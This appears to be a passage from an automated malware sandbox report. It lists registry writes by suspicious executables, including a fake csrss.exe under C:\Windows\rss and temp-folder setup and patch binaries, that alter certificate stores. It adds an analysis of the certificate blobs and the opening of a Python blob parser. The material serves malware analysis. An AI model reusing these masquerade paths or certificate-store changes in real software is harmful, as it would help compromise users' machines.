| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = … | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
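The Blob values in this table are CryptoAPI serialized certificate contexts: a list of CERT_*_PROP_ID records ending in the DER certificate, so the hex itself says what was installed. The friendly-name record in the DAC9024F… AuthRoot blob decodes to "DST Root CA X3" and the subject inside the DF3C24F9… ROOT blob reads "DigiCert Global Root G2" (both are readable in the hex above), and all four thumbprints in this table belong to roots in the public trust programs (ISRG Root X1, Baltimore CyberTrust Root, DigiCert Global Root G2, DST Root CA X3). That is consistent with CryptoAPI caching roots during chain building for the TLS connections in the Network section (apps.identrust.com is where Windows fetches the DST Root CA X3 cross-certificates) rather than with a planted root; what would betray a hand-built entry is a blob whose cached SHA1, key name and actual certificate hash disagree. The parser below is an added example and not part of this report; the `describe()` API and its two sample blobs are constructed here, with a five-byte stand-in DER body in place of a real certificate, so it runs offline.

```python
"""Parser for the CryptoAPI certificate-store Blob values written under
SystemCertificates\\...\\Certificates\\<SHA1>\\Blob (added example, not part of the
report). A Blob is a sequence of property records, each
<DWORD propid><DWORD reserved=1><DWORD length><data>; the certificate itself is
the record with propid 0x20 (CERT_CERT_PROP_ID), normally the last one."""
import hashlib
import struct

PROP_NAMES = {
    0x03: "CERT_SHA1_HASH_PROP_ID", 0x04: "CERT_MD5_HASH_PROP_ID",
    0x09: "CERT_ENHKEY_USAGE_PROP_ID", 0x0B: "CERT_FRIENDLY_NAME_PROP_ID",
    0x0F: "CERT_SIGNATURE_HASH_PROP_ID", 0x14: "CERT_KEY_IDENTIFIER_PROP_ID",
    0x19: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    0x1D: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID", 0x20: "CERT_CERT_PROP_ID",
}
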